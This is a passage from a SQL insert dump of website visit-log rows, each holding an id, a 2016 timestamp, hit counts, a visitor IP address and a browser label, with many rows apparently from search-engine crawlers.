178.95.158.10','firefox'),(10578,1456759598,1,1,0,0,'194.126.180.206','chrome'),(10579,1456759773,1,1,0,0,'46.98.10.7','chrome'),(10580,1456760014,1,1,0,0,'207.46.13.16','other'),(10581,1456760099,1,1,0,0,'37.53.89.22','chrome'),(10582,1456760492,1,0,1,0,'68.180.229.232',''),(10583,1456760560,1,1,0,0,'66.249.81.205','other'),(10584,1456760717,1,1,0,0,'46.211.155.148','other'),(10585,1456760816,1,1,0,0,'216.163.188.225','firefox'),(10586,1456761049,1,1,0,0,'216.163.188.224','firefox'),(10587,1456761507,1,1,0,0,'217.69.136.205','other'),(10588,1456761618,1,1,0,0,'66.249.64.182','other'),(10589,1456761697,1,0,1,0,'66.249.64.177',''),(10590,1456761784,2,0,2,0,'66.249.64.22',''),(10591,1456761972,1,1,0,0,'66.249.64.177','other'),(10592,1456762005,72,72,0,0,'207.46.13.143','other'),(10593,1456762013,13,13,0,0,'141.8.184.18','other'),(10594,1456762014,1,0,1,0,'66.249.64.172',''),(10595,1456762023,1,1,0,0,'141.8.183.14','other'),(10596,1456762029,1,1,0,0,'178.154.149.11','other'),(10597,1456762034,53,53,0,0,'40.77.167.65','other'),(10598,1456762133,71,71,0,0,'157.55.39.34','other'),(10599,1456762204,52,52,0,0,'207.46.13.16','other'),(10600,1456762282,1,1,0,0,'91.196.178.67','firefox'),(10601,1456762451,1,1,0,0,'94.179.8.49','firefox'),(10602,1456762705,1,1,0,0,'66.249.89.87','other'),(10603,1456762793,1,0,1,0,'66.249.64.182',''),(10604,1456762896,1,1,0,0,'91.196.178.165','firefox'),(10605,1456763024,1,1,0,0,'8.29.198.25','other'),(10606,1456763223,1,0,1,0,'66.249.64.177',''),(10607,1456763280,1,1,0,0,'66.249.64.182','other'),(10608,1456763543,2,2,0,0,'66.249.64.177','other'),(10609,1456763680,1,1,0,0,'62.210.215.100','chrome'),(10610,1456763822,1,1,0,0,'31.202.241.227','firefox'),(10611,1456763824,1,1,0,0,'31.202.212.95','firefox'),(10613,1456763868,3,0,3,0,'66.249.64.172',''),(10614,1456763968,63,63,0,0,'141.8.184.18','other'),(10615,1456764140,2,1,1,0,'66.249.64.172',''),(10616,1456764470,17,17,0,0,'178.154.149.11','other'),(10617,1456764473,8,8,0,0,'141.8.183.14','other'),(10618,1456764551,5,5,0,0,'93.158.152.9','other'),(10619,1456764647,1,1,0,0,'5.255.253.53','other'),(10620,1456764748,1,1,0,0,'207.46.13.16','other'),(10621,1456764859,3,2,1,0,'66.249.64.172',''),(10622,1456764869,17,17,0,0,'141.8.184.18','other'),(10623,1456764943,1,1,0,0,'178.92.248.85','firefox'),(10624,1456765288,1,1,0,0,'180.76.15.139','other'),(10625,1456765338,2,1,1,0,'66.249.64.177',''),(10626,1456765474,1,0,1,0,'68.180.229.232',''),(10627,1456765718,1,1,0,0,'91.196.178.133','chrome'),(10628,1456766146,1,1,0,0,'180.76.15.143','other'),(10629,1456766509,1,1,0,0,'66.249.64.27','other'),(10630,1456766703,1,0,1,0,'68.180.229.232',''),(10631,1456767435,3,1,2,0,'66.249.66.158',''),(10632,1456767759,1,1,0,0,'66.249.81.208','other'),(10633,1456767892,2,0,2,0,'68.180.229.232',''),(10634,1456768047,1,1,0,0,'66.249.66.162','other'),(10635,1456768414,2,0,2,0,'66.249.66.158',''),(10636,1456769128,1,1,0,0,'66.249.66.133','other'),(10637,1456769200,3,3,0,0,'141.8.184.18','other'),(10638,1456769204,4,4,0,0,'93.158.152.9','other'),(10640,1456769208,4,4,0,0,'5.255.253.53','other'),(10641,1456769212,2,2,0,0,'141.8.183.14','other'),(10642,1456769214,4,4,0,0,'178.154.149.11','other'),(10643,1456769216,2,2,0,0,'141.8.132.97','other'),(10644,1456769217,2,2,0,0,'141.8.142.88','other'),(10645,1456769221,2,2,0,0,'130.193.37.27','other'),(10647,1456769579,1,1,0,0,'91.229.243.6','chrome'),(10648,1456769622,2,2,0,0,'5.255.253.110','other'),(10649,1456769624,2,2,0,0,'5.255.253.30','other'),(10651,1456769625,1,1,0,0,'141.8.132.79','other'),(10652,1456769626,1,1,0,0,'141.8.142.41','other'),(10653,1456769630,2,2,0,0,'130.193.37.21','other'),(10654,1456769631,1,1,0,0,'130.193.51.45','other'),(10655,1456769632,2,2,0,0,'141.8.132.2','other'),(10656,1456769633,1,1,0,0,'141.8.142.10','other'),(10657,1456769635,1,1,0,0,'130.193.51.81','other'),(10659,1456769639,1,1,0,0,'141.8.132.76','other'),(10660,1456769644,1,1,0,0,'5.255.253.100','other'),(10661,1456769645,1,1,0,0,'130.193.51.43','other'),(10662,1456769647,1,1,0,0,'93.158.152.26','other'),(10663,1456770020,1,1,0,0,'193.151.13.232','other'),(10664,1456770037,3,1,2,0,'66.249.66.162',''),(10665,1456770292,1,1,0,0,'46.211.251.15','chrome'),(10666,1456770390,2,2,0,0,'66.249.66.158','other'),(10667,1456770452,1,1,0,0,'40.77.167.65','other'),(10668,1456770499,2,2,0,0,'91.196.178.132','chrome'),(10669,1456770605,1,1,0,0,'178.92.248.85','firefox'),(10670,1456771369,1,1,0,0,'66.249.81.208','other'),(10671,1456771419,3,2,1,0,'66.249.66.158',''),(10672,1456771445,2,0,2,0,'68.180.229.232',''),(10673,1456771566,2,1,1,0,'66.249.66.166',''),(10674,1456771893,1,1,0,0,'157.55.39.106','other'),(10675,1456771948,1,1,0,0,'94.179.69.182','firefox'),(10676,1456772214,15,15,0,0,'178.154.149.11','other'),(10677,1456772215,6,6,0,0,'141.8.184.18','other'),(10678,1456772219,9,9,0,0,'141.8.183.14','other'),(10679,1456772221,2,2,0,0,'93.158.152.9','other'),(10680,1456772222,1,1,0,0,'5.255.253.53','other'),(10681,1456772347,1,0,1,0,'66.249.66.162',''),(10682,1456772465,1,0,1,0,'68.180.229.232',''),(10683,1456772700,331,331,0,0,'82.193.127.15','other'),(10684,1456772929,1,1,0,0,'66.249.66.162','other'),(10685,1456773111,1,1,0,0,'66.249.92.99','other'),(10686,1456773216,1,0,1,0,'66.249.66.158',''),(10687,1456773397,1,1,0,0,'77.35.26.56','chrome'),(10688,1456773494,1,1,0,0,'178.92.113.68','chrome'),(10689,1456773593,1,1,0,0,'78.27.165.110','opera'),(10690,1456773898,2,2,0,0,'66.249.66.166','other'),(10691,1456773900,1,1,0,0,'8.29.198.26','other'),(10692,1456774144,1,1,0,0,'46.39.55.65','firefox'),(10693,1456774450,2,2,0,0,'66.249.66.162','other'),(10694,1456774654,1,1,0,0,'157.55.39.106','other'),(10695,1456774788,1,0,1,0,'66.249.66.168',''),(10696,1456774964,1,1,0,0,'66.249.81.205','other'),(10697,1456775695,3,2,1,0,'66.249.66.166',''),(10698,1456775766,3,3,0,0,'66.249.66.158','other'),(10699,1456775809,1,1,0,0,'66.249.66.129','other'),(10700,1456775863,1,1,0,0,'62.210.215.100','chrome'),(10701,1456775917,1,1,0,0,'180.76.15.8','other'),(10702,1456775987,1,1,0,0,'180.76.15.27','other'),(10703,1456776147,1,1,0,0,'157.55.39.106','other'),(10704,1456776214,1,1,0,0,'66.249.66.162','other'),(10705,1456777094,1,0,1,0,'66.249.66.190',''),(10706,1456777195,1,1,0,0,'157.55.39.34','other'),(10707,1456777512,1,0,1,0,'66.249.66.162',''),(10708,1456777694,2,0,2,0,'66.249.66.158',''),(10709,1456778082,2,2,0,0,'130.193.37.21','other'),(10710,1456778083,1,1,0,0,'93.158.152.26','other'),(10712,1456778084,2,2,0,0,'141.8.142.88','other'),(10713,1456778085,1,1,0,0,'141.8.142.8','other'),(10714,1456778087,1,1,0,0,'141.8.132.76','other'),(10716,1456778088,2,2,0,0,'5.255.253.110','other'),(10717,1456778090,2,2,0,0,'141.8.132.74','other'),(10718,1456778091,1,1,0,0,'5.255.253.53','other'),(10719,1456778094,1,1,0,0,'130.193.51.43','other'),(10720,1456778095,1,1,0,0,'5.255.253.55','other'),(10721,1456778096,2,2,0,0,'5.255.253.51','other'),(10722,1456778098,1,1,0,0,'178.154.149.11','other'),(10723,1456778099,2,2,0,0,'130.193.51.45','other'),(10724,1456778100,1,1,0,0,'141.8.142.10','other'),(10726,1456778101,1,1,0,0,'5.255.253.30','other'),(10727,1456778102,2,2,0,0,'130.193.51.85','other'),(10728,1456778103,1,1,0,0,'141.8.132.109','other'),(10730,1456778104,1,1,0,0,'141.8.132.99','other'),(10731,1456778105,1,1,0,0,'5.255.253.10','other'),(10732,1456778106,1,1,0,0,'130.193.51.81','other'),(10733,1456778108,2,2,0,0,'141.8.132.79','other'),(10734,1456778109,1,1,0,0,'141.8.184.18','other'),(10735,1456778110,1,1,0,0,'93.158.152.9','other'),(10736,1456778112,1,1,0,0,'5.255.253.9','other'),(10737,1456778115,1,1,0,0,'141.8.132.44','other'),(10738,1456778116,1,1,0,0,'141.8.183.14','other'),(10739,1456778139,5,1,4,0,'66.249.66.162',''),(10740,1456778570,1,0,1,0,'66.249.66.129',''),(10741,1456778632,1,1,0,0,'66.249.81.208','other'),(10742,1456778830,1,0,1,0,'68.180.229.232',''),(10743,1456778983,1,1,0,0,'66.249.66.162','other'),(10744,1456778995,1,1,0,0,'66.249.66.158','other'),(10745,1456779595,3,0,3,0,'66.249.66.166',''),(10746,1456779995,1,1,0,0,'66.249.66.162','other'),(10747,1456780328,8,0,8,0,'66.249.66.158',''),(10748,1456780530,7,7,0,0,'93.158.152.9','other'),(10749,1456780535,4,4,0,0,'141.8.183.14','other'),(10751,1456780537,2,2,0,0,'5.255.253.53','other'),(10752,1456780538,6,6,0,0,'141.8.184.18','other'),(10753,1456780540,7,7,0,0,'178.154.149.11','other'),(10754,1456780735,10,10,0,0,'91.209.51.22','other'),(10755,1456780883,2,0,2,0,'68.180.229.232',''),(10756,1456780980,1,0,1,0,'66.249.66.133',''),(10757,1456780981,1,0,1,0,'66.249.66.166',''),(10758,1456781018,1,0,1,0,'66.249.66.162',''),(10759,1456781320,2,2,0,0,'66.249.66.166','other'),(10760,1456781581,1,1,0,0,'37.48.80.101','chrome'),(10761,1456781762,1,1,0,0,'66.249.66.129','other'),(10762,1456782082,2,2,0,0,'66.249.66.158','other'),(10763,1456782159,1,1,0,0,'66.249.81.208','other'),(10764,1456782170,1,0,1,0,'68.180.229.232',''),(10765,1456782388,20,20,0,0,'141.8.184.18','other'),(10766,1456782389,24,24,0,0,'178.154.149.11','other'),(10767,1456782390,5,5,0,0,'5.255.253.53','other'),(10768,1456782392,18,18,0,0,'141.8.183.14','other'),(10769,1456782575,3,1,2,0,'66.249.66.166',''),(10770,1456782677,8,8,0,0,'93.158.152.9','other'),(10771,1456782679,3,3,0,0,'141.8.132.99','other'),(10772,1456782945,2,0,2,0,'66.249.66.129',''),(10773,1456783011,2,0,2,0,'66.249.66.162',''),(10774,1456783013,21,0,21,0,'66.249.66.158',''),(10775,1456783149,1,1,0,0,'66.249.66.190','other'),(10776,1456783154,1,0,1,0,'66.249.65.181',''),(10777,1456783210,1,1,0,0,'217.69.133.252','other'),(10778,1456783315,4,1,3,0,'66.249.66.158',''),(10779,1456783641,1,1,0,0,'66.249.92.103','other'),(10780,1456784225,2,2,0,0,'141.8.183.14','other'),(10781,1456784229,1,1,0,0,'178.154.149.11','other'),(10782,1456784238,1,1,0,0,'141.8.184.18','other'),(10783,1456784325,3,1,2,0,'66.249.66.166',''),(10784,1456784724,1,1,0,0,'8.29.198.25','other'),(10785,1456784833,1,0,1,0,'68.180.229.232',''),(10786,1456784927,3,3,0,0,'130.193.51.55','other'),(10787,1456785143,2,0,2,0,'66.249.66.158',''),(10788,1456785173,2,2,0,0,'5.255.253.30','other'),(10789,1456785175,1,1,0,0,'141.8.142.82','other'),(10790,1456785177,1,1,0,0,'40.77.167.65','other'),(10791,1456785182,9,9,0,0,'141.8.184.18','other'),(10792,1456785185,2,2,0,0,'141.8.184.6','other'),(10793,1456785187,3,3,0,0,'5.255.253.53','other'),(10794,1456785197,1,1,0,0,'5.255.253.62','other'),(10795,1456785200,1,1,0,0,'93.158.152.65','other'),(10796,1456785204,1,1,0,0,'141.8.142.60','other'),(10797,1456785232,4,4,0,0,'93.158.152.9','other'),(10798,1456785284,1,1,0,0,'141.8.132.79','other'),(10799,1456785646,1,1,0,0,'62.210.215.100','chrome'),(10800,1456785683,1,0,1,0,'66.249.66.162',''),(10801,1456785688,3,1,2,0,'66.249.66.158',''),(10802,1456785817,1,1,0,0,'66.249.81.208','other'),(10803,1456785835,9,9,0,0,'141.8.183.14','other'),(10804,1456785837,4,4,0,0,'178.154.149.11','other'),(10805,1456785841,1,1,0,0,'5.255.253.89','other'),(10806,1456785842,1,1,0,0,'141.8.132.99','other'),(10807,1456785843,1,1,0,0,'130.193.51.43','other'),(10808,1456785844,2,2,0,0,'141.8.142.10','other'),(10810,1456785847,1,1,0,0,'141.8.184.22','other'),(10811,1456785888,1,1,0,0,'66.249.66.158','other'),(10812,1456786081,1,0,1,0,'66.249.66.133',''),(10813,1456786138,1,0,1,0,'68.180.229.232',''),(10814,1456786382,3,1,2,0,'66.249.66.166',''),(10815,1456786671,2,0,2,0,'66.249.66.162',''),(10816,1456787114,1,0,1,0,'66.249.66.133',''),(10817,1456787591,2,1,1,0,'66.249.66.158',''),(10818,1456787801,48,48,0,0,'87.237.9.22','firefox'),(10819,1456787949,1,0,1,0,'66.249.66.166',''),(10820,1456788692,6,6,0,0,'178.154.149.11','other'),(10821,1456788693,3,3,0,0,'141.8.184.18','other'),(10822,1456788694,6,6,0,0,'5.255.253.53','other'),(10823,1456788695,3,3,0,0,'130.193.37.21','other'),(10824,1456788696,6,6,0,0,'93.158.152.9','other'),(10825,1456788698,6,6,0,0,'141.8.183.14','other'),(10826,1456788708,1,1,0,0,'141.8.132.2','other'),(10827,1456788721,2,2,0,0,'141.8.132.99','other'),(10828,1456788985,1,0,1,0,'66.249.66.166',''),(10829,1456789006,1,0,1,0,'66.249.66.162',''),(10830,1456789107,1,0,1,0,'66.249.66.190',''),(10831,1456789530,1,1,0,0,'66.249.81.208','other'),(10832,1456789568,1,0,1,0,'66.249.66.129',''),(10833,1456790112,2,0,2,0,'66.249.66.166',''),(10834,1456790455,1,0,1,0,'66.249.66.162',''),(10835,1456791027,1,0,1,0,'66.249.66.133',''),(10836,1456791109,6,6,0,0,'141.8.183.14','other'),(10837,1456791135,5,5,0,0,'141.8.132.99','other'),(10838,1456791237,4,4,0,0,'178.154.149.11','other'),(10839,1456791239,3,3,0,0,'93.158.152.9','other'),(10840,1456791240,6,6,0,0,'141.8.184.18','other'),(10841,1456791242,1,1,0,0,'130.193.37.21','other'),(10842,1456791243,2,2,0,0,'5.255.253.53','other'),(10843,1456791495,1,1,0,0,'157.55.39.106','other'),(10844,1456791591,1,1,0,0,'157.55.39.34','other'),(10845,1456791799,2,0,2,0,'66.249.66.162',''),(10846,1456792733,3,0,3,0,'66.249.66.162',''),(10847,1456792751,21,21,0,0,'141.8.184.18','other'),(10848,1456792839,5,5,0,0,'93.158.152.9','other'),(10849,1456792844,2,2,0,0,'141.8.132.99','other'),(10850,1456792848,4,4,0,0,'141.8.183.14','other'),(10851,1456792957,1,1,0,0,'130.193.37.21','other'),(10852,1456792995,5,5,0,0,'178.154.149.11','other'),(10853,1456793054,2,0,2,0,'66.249.66.158',''),(10854,1456793870,1,0,1,0,'66.249.66.166',''),(10855,1456794265,3,0,3,0,'66.249.66.158',''),(10856,1456794349,1,1,0,0,'40.77.167.65','other'),(10857,1456794360,1,1,0,0,'66.249.92.95','other'),(10858,1456794368,1,0,1,0,'66.249.66.133',''),(10859,1456794614,2,1,1,0,'66.249.66.162',''),(10860,1456794735,5,5,0,0,'141.8.184.18','other'),(10861,1456794739,8,8,0,0,'5.255.253.53','other'),(10862,1456794743,5,5,0,0,'178.154.149.11','other'),(10863,1456794747,6,6,0,0,'130.193.37.21','other'),(10864,1456794759,8,8,0,0,'141.8.183.14','other'),(10865,1456795243,1,1,0,0,'93.158.152.9','other'),(10866,1456795247,2,2,0,0,'141.8.132.99','other'),(10867,1456795323,1,1,0,0,'5.255.253.100','other'),(10868,1456795389,1,1,0,0,'157.55.39.106','other'),(10869,1456795549,1,1,0,0,'62.210.215.100','chrome'),(10870,1456795584,1,1,0,0,'8.29.198.26','other'),(10871,1456795743,1,0,1,0,'66.249.66.158',''),(10872,1456796239,217,217,0,0,'82.193.127.15','other'),(10873,1456796291,2,0,2,0,'68.180.229.232',''),(10874,1456796373,6,6,0,0,'178.154.149.11','other'),(10875,1456796374,1,1,0,0,'141.8.132.99','other'),(10876,1456796410,1,0,1,0,'66.249.66.162',''),(10877,1456796664,2,0,2,0,'66.249.66.166',''),(10878,1456797104,1,1,0,0,'157.55.39.34','other'),(10879,1456797207,6,6,0,0,'141.8.184.18','other'),(10880,1456797215,5,5,0,0,'141.8.183.14','other'),(10881,1456797223,10,10,0,0,'93.158.152.9','other'),(10882,1456797277,6,6,0,0,'178.154.149.11','other'),(10883,1456797283,1,1,0,0,'130.193.37.21','other'),(10884,1456797292,4,4,0,0,'5.255.253.53','other'),(10885,1456798200,1,0,1,0,'66.249.66.158',''),(10886,1456798762,3,2,1,0,'66.249.66.158',''),(10887,1456798773,1,1,0,0,'66.249.66.133','other'),(10888,1456798783,1,1,0,0,'66.249.66.162','other'),(10889,1456798925,10,10,0,0,'178.154.149.11','other'),(10890,1456799346,5,5,0,0,'5.255.253.53','other'),(10891,1456799350,2,2,0,0,'141.8.183.14','other'),(10892,1456799351,3,3,0,0,'141.8.184.18','other'),(10893,1456799353,6,6,0,0,'93.158.152.9','other'),(10894,1456799354,6,6,0,0,'130.193.37.21','other'),(10895,1456799408,1,1,0,0,'157.55.39.250','other'),(10896,1456800009,1,1,0,0,'178.154.149.11','other'),(10897,1456800010,1,1,0,0,'141.8.132.99','other'),(10898,1456800318,1,0,1,0,'66.249.66.166',''),(10899,1456800364,1,0,1,0,'66.249.66.162',''),(10900,1456800883,1,1,0,0,'141.8.184.18','other'),(10901,1456801431,10,10,0,0,'157.55.39.106','other'),(10902,1456801470,4,4,0,0,'40.77.167.65','other'),(10903,1456801475,12,12,0,0,'157.55.39.34','other'),(10904,1456801501,6,6,0,0,'157.55.39.250','other'),(10905,1456801966,2,2,0,0,'141.8.132.76','other'),(10907,1456801967,1,1,0,0,'130.193.51.55','other'),(10908,1456801968,1,1,0,0,'93.158.152.26','other'),(10909,1456802467,1,0,1,0,'66.249.66.158',''),(10910,1456802828,1,0,1,0,'66.249.66.166',''),(10911,1456804171,1,1,0,0,'130.193.51.45','other'),(10912,1456804172,1,1,0,0,'178.154.149.11','other'),(10913,1456804176,2,0,2,0,'66.249.66.158',''),(10914,1456804184,1,1,0,0,'5.255.253.10','other'),(10915,1456804185,1,1,0,0,'141.8.132.97','other'),(10916,1456804186,1,1,0,0,'130.193.51.102','other'),(10918,1456804693,1,1,0,0,'40.77.167.65','other'),(10919,1456804862,2,0,2,0,'66.249.66.162',''),(10920,1456805425,1,1,0,0,'157.55.39.250','other'),(10921,1456805453,1,1,0,0,'66.249.92.99','other'),(10922,1456805598,2,0,2,0,'66.249.66.166',''),(10923,1456805605,1,1,0,0,'40.77.167.65','other'),(10924,1456805688,1,0,1,0,'68.180.229.232',''),(10925,1456805796,2,2,0,0,'141.8.184.18','other'),(10926,1456805797,2,2,0,0,'178.154.149.11','other'),(10927,1456806052,1,1,0,0,'62.210.215.100','chrome'),(10928,1456806153,5,0,5,0,'66.249.66.162',''),(10929,1456806396,1,1,0,0,'8.29.198.25','other'),(10930,1456806520,1,0,1,0,'66.249.66.158',''),(10931,1456806970,1,1,0,0,'141.8.142.10','other'),(10932,1456806971,1,1,0,0,'130.193.37.27','other'),(10933,1456806987,1,1,0,0,'141.8.142.88','other'),(10934,1456806988,1,1,0,0,'5.255.253.110','other'),(10935,1456807394,1,1,0,0,'157.55.39.34','other'),(10936,1456807502,3,0,3,0,'66.249.66.162',''),(10937,1456807733,1,1,0,0,'66.249.66.133','other'),(10938,1456807761,1,0,1,0,'66.249.66.158',''),(10939,1456808331,2,1,1,0,'66.249.66.158',''),(10940,1456808438,1,0,1,0,'68.180.229.232',''),(10941,1456808712,2,2,0,0,'141.8.184.18','other'),(10942,1456808797,1,0,1,0,'66.249.66.162',''),(10943,1456808993,1,1,0,0,'217.69.133.3','other'),(10944,1456809033,1,1,0,0,'178.154.149.11','other'),(10945,1456809847,1,0,1,0,'66.249.66.166',''),(10946,1456810026,1,1,0,0,'130.193.51.81','other'),(10947,1456810027,1,1,0,0,'141.8.184.22','other'),(10948,1456810122,1,1,0,0,'130.193.37.27','other'),(10949,1456810554,4,2,2,0,'66.249.66.162',''),(10950,1456810565,2,1,1,0,'66.249.66.166',''),(10951,1456810605,4,4,0,0,'66.249.66.158','other'),(10952,1456810617,1,1,0,0,'66.249.66.129','other'),(10953,1456810648,2,2,0,0,'141.8.184.18','other'),(10954,1456810660,1,1,0,0,'66.249.66.190','other'),(10955,1456810798,1,1,0,0,'82.193.127.15','other'),(10956,1456811177,1,1,0,0,'66.249.81.211','other'),(10957,1456811344,1,1,0,0,'217.69.133.2','other'),(10958,1456811694,2,0,2,0,'66.249.66.162',''),(10959,1456811722,3,0,3,0,'66.249.66.158',''),(10960,1456812066,1,1,0,0,'180.76.15.25','other'),(10961,1456812182,1,0,1,0,'68.180.229.232',''),(10962,1456812290,1,0,1,0,'66.249.66.166',''),(10963,1456812392,1,0,1,0,'66.249.66.129',''),(10964,1456813182,2,0,2,0,'66.249.66.158',''),(10965,1456813275,1,0,1,0,'66.249.66.166',''),(10966,1456813508,1,1,0,0,'217.69.133.2','other'),(10967,1456814148,1,1,0,0,'141.8.132.2','other'),(10968,1456814149,1,1,0,0,'5.255.253.10','other'),(10969,1456814545,2,0,2,0,'66.249.66.166',''),(10970,1456814666,1,1,0,0,'141.8.184.22','other'),(10972,1456814709,1,1,0,0,'66.249.93.86','firefox'),(10973,1456814761,1,1,0,0,'66.249.81.211','other'),(10974,1456814791,1,1,0,0,'141.8.132.79','other'),(10976,1456814792,1,1,0,0,'130.193.51.85','other'),(10977,1456815082,1,1,0,0,'91.196.178.72','chrome'),(10978,1456815179,1,0,1,0,'66.249.66.158',''),(10979,1456815444,1,1,0,0,'91.193.166.97','chrome'),(10980,1456816190,1,1,0,0,'66.249.92.95','other'),(10981,1456816536,1,1,0,0,'178.154.189.204','other'),(10982,1456816548,1,1,0,0,'141.8.132.109','other'),(10983,1456816549,1,1,0,0,'130.193.51.7','other'),(10984,1456816696,1,1,0,0,'37.54.56.174','chrome'),(10985,1456816856,1,1,0,0,'94.178.8.175','chrome'),(10986,1456816860,1,1,0,0,'62.210.215.100','chrome'),(10987,1456816998,1,0,1,0,'68.180.229.232',''),(10988,1456817140,1,0,1,0,'66.249.66.166',''),(10989,1456817163,1,1,0,0,'91.196.178.71','firefox'),(10990,1456817243,1,1,0,0,'8.29.198.25','other'),(10991,1456817357,1,1,0,0,'217.69.133.247','other'),(10992,1456817552,1,1,0,0,'141.8.184.18','other'),(10994,1456818094,1,0,1,0,'66.249.66.158',''),(10995,1456818102,1,1,0,0,'91.196.178.72','chrome'),(10996,1456818384,1,1,0,0,'66.249.81.211','other'),(10997,1456819289,1,1,0,0,'212.193.117.245','other'),(10998,1456819409,1,1,0,0,'66.249.66.129','other'),(10999,1456819428,1,1,0,0,'93.73.224.159','firefox'),(11000,1456819557,2,2,0,0,'66.249.66.190','other'),(11001,1456819632,3,0,3,0,'66.249.66.158',''),(11002,1456819642,5,0,5,0,'66.249.66.162',''),(11003,1456819753,1,1,0,0,'144.76.8.132','other'),(11004,1456820081,1,1,0,0,'95.132.2.216','chrome'),(11005,1456820203,1,1,0,0,'91.196.178.103','chrome'),(11006,1456820583,1,1,0,0,'93.73.224.159','firefox'),(11007,1456820889,2,0,2,0,'66.249.66.162',''),(11008,1456820968,1,0,1,0,'66.249.66.158',''),(11009,1456821699,1,0,1,0,'66.249.66.166',''),(11010,1456822050,1,1,0,0,'66.249.81.208','other'),(11011,1456822051,1,0,1,0,'66.249.66.190',''),(11012,1456822104,1,1,0,0,'66.249.66.162','other'),(11013,1456822127,2,2,0,0,'31.16.43.186','other'),(11014,1456822143,1,1,0,0,'91.196.178.71','chrome'),(11015,1456822194,1,1,0,0,'66.102.9.104','firefox'),(11016,1456822769,1,1,0,0,'141.8.183.14','other'),(11017,1456822770,1,1,0,0,'178.154.149.11','other'),(11018,1456822827,2,2,0,0,'37.9.122.203','other'),(11019,1456822907,1,1,0,0,'178.154.189.203','other'),(11020,1456822918,1,1,0,0,'66.249.66.166','other'),(11021,1456823035,2,2,0,0,'91.196.178.72','chrome'),(11022,1456823139,2,1,1,0,'66.249.66.133',''),(11023,1456823203,1,1,0,0,'178.93.40.36','chrome'),(11024,1456823242,1,1,0,0,'80.91.162.99','other'),(11025,1456823413,1,1,0,0,'91.196.178.169','chrome'),(11026,1456823426,1,0,1,0,'40.77.167.65',''),(11027,1456823552,1,1,0,0,'91.196.178.135','firefox'),(11028,1456823558,1,1,0,0,'180.76.15.7','other'),(11029,1456823622,1,1,0,0,'66.249.66.190','other'),(11030,1456823736,1,0,1,0,'66.249.66.158',''),(11031,1456823905,1,0,1,0,'66.249.66.166',''),(11032,1456824114,1,1,0,0,'178.93.40.36','chrome'),(11033,1456824292,1,1,0,0,'37.54.16.98','chrome'),(11034,1456824858,1,1,0,0,'157.55.39.250','other'),(11035,1456825649,1,1,0,0,'66.249.81.211','other'),(11036,1456826092,3,0,3,0,'68.180.229.232',''),(11037,1456826289,1,1,0,0,'178.154.149.11','other'),(11038,1456826290,1,1,0,0,'141.8.184.18','other'),(11039,1456826545,1,1,0,0,'91.196.178.72','chrome'),(11040,1456826688,1,1,0,0,'91.196.178.70','chrome'),(11041,1456826764,1,1,0,0,'94.179.96.236','chrome'),(11042,1456826899,1,1,0,0,'91.196.178.129','chrome'),(11043,1456826974,2,2,0,0,'62.210.215.100','chrome'),(11044,1456827011,1,1,0,0,'66.249.92.103','other'),(11045,1456827489,1,1,0,0,'178.154.189.203','other'),(11046,1456827493,2,2,0,0,'178.154.189.204','other'),(11047,1456827554,1,1,0,0,'66.249.66.162','other'),(11048,1456827672,1,1,0,0,'217.69.133.12','other'),(11049,1456827895,1,1,0,0,'94.179.96.236','chrome'),(11050,1456828075,1,1,0,0,'8.29.198.26','other'),(11051,1456828494,1,0,1,0,'66.249.66.166',''),(11052,1456828515,1,1,0,0,'130.193.51.85','other'),(11054,1456828517,1,1,0,0,'130.193.51.55','other'),(11055,1456828528,1,1,0,0,'85.223.178.26','chrome'),(11056,1456828559,1,1,0,0,'141.8.184.18','other'),(11057,1456828560,1,1,0,0,'178.154.149.11','other'),(11058,1456828781,3,0,3,0,'66.249.66.158',''),(11059,1456828838,1,0,1,0,'66.249.66.190',''),(11060,1456828882,2,0,2,0,'66.249.66.162',''),(11061,1456829164,1,1,0,0,'66.249.81.208','other'),(11062,1456829573,1,1,0,0,'5.255.253.9','other'),(11063,1456829574,1,1,0,0,'130.193.37.21','other'),(11064,1456829665,1,1,0,0,'192.99.107.216','other'),(11065,1456829688,1,1,0,0,'91.196.178.72','chrome'),(11066,1456829874,1,1,0,0,'157.55.39.39','other'),(11067,1456829905,1,1,0,0,'94.179.96.236','chrome'),(11068,1456829973,1,1,0,0,'217.69.133.239','other'),(11069,1456830896,1,0,1,0,'66.249.66.166',''),(11070,1456830980,2,2,0,0,'157.55.39.39','other'),(11071,1456831129,1,1,0,0,'37.9.122.202','other'),(11072,1456831589,1,0,1,0,'66.249.66.162',''),(11073,1456831642,1,1,0,0,'78.111.190.247','firefox'),(11074,1456831946,1,1,0,0,'91.196.178.70','chrome'),(11075,1456831968,3,3,0,0,'141.8.184.18','other'),(11077,1456831970,1,1,0,0,'5.255.253.53','other'),(11079,1456831972,1,1,0,0,'178.154.149.11','other'),(11080,1456832055,1,0,1,0,'66.249.66.158',''),(11081,1456832186,1,1,0,0,'93.170.189.133','chrome'),(11082,1456832739,1,1,0,0,'193.53.83.25','chrome'),(11083,1456832746,1,1,0,0,'37.53.74.49','chrome'),(11084,1456832791,1,1,0,0,'66.249.81.211','other'),(11085,1456832897,1,0,1,0,'66.249.66.162',''),(11086,1456832984,1,1,0,0,'141.8.184.18','other'),(11087,1456832985,1,1,0,0,'178.154.149.11','other'),(11088,1456833043,1,0,1,0,'66.249.66.158',''),(11089,1456833100,1,0,1,0,'66.249.66.133',''),(11090,1456833126,1,1,0,0,'157.55.39.250','other'),(11091,1456833237,1,1,0,0,'157.55.39.106','other'),(11092,1456833276,1,0,1,0,'66.249.66.166',''),(11093,1456833354,1,1,0,0,'91.196.178.72','firefox'),(11094,1456834017,2,0,2,0,'66.249.66.158',''),(11095,1456834240,1,0,1,0,'66.249.66.166',''),(11096,1456834393,2,0,2,0,'68.180.229.232',''),(11097,1456834863,2,2,0,0,'141.8.184.18','other'),(11098,1456835180,1,0,1,0,'66.249.66.166',''),(11099,1456835528,2,2,0,0,'157.55.39.39','other'),(11100,1456835544,1,1,0,0,'66.249.93.90','firefox'),(11101,1456835585,2,0,2,0,'66.249.66.158',''),(11102,1456835708,1,1,0,0,'91.196.179.69','chrome'),(11103,1456835798,1,0,1,0,'66.249.79.249',''),(11104,1456835861,1,1,0,0,'217.69.133.21','other'),(11105,1456835965,1,0,1,0,'66.249.66.162',''),(11106,1456836284,2,0,2,0,'68.180.229.232',''),(11107,1456836364,2,0,2,0,'66.249.66.166',''),(11108,1456836478,1,1,0,0,'66.249.81.208','other'),(11109,1456836794,1,1,0,0,'95.132.115.134','msie'),(11110,1456836919,1,1,0,0,'217.69.133.193','other'),(11111,1456837439,1,1,0,0,'95.134.49.19','firefox'),(11112,1456837576,1,1,0,0,'130.193.37.27','other'),(11113,1456837583,1,1,0,0,'93.158.152.9','o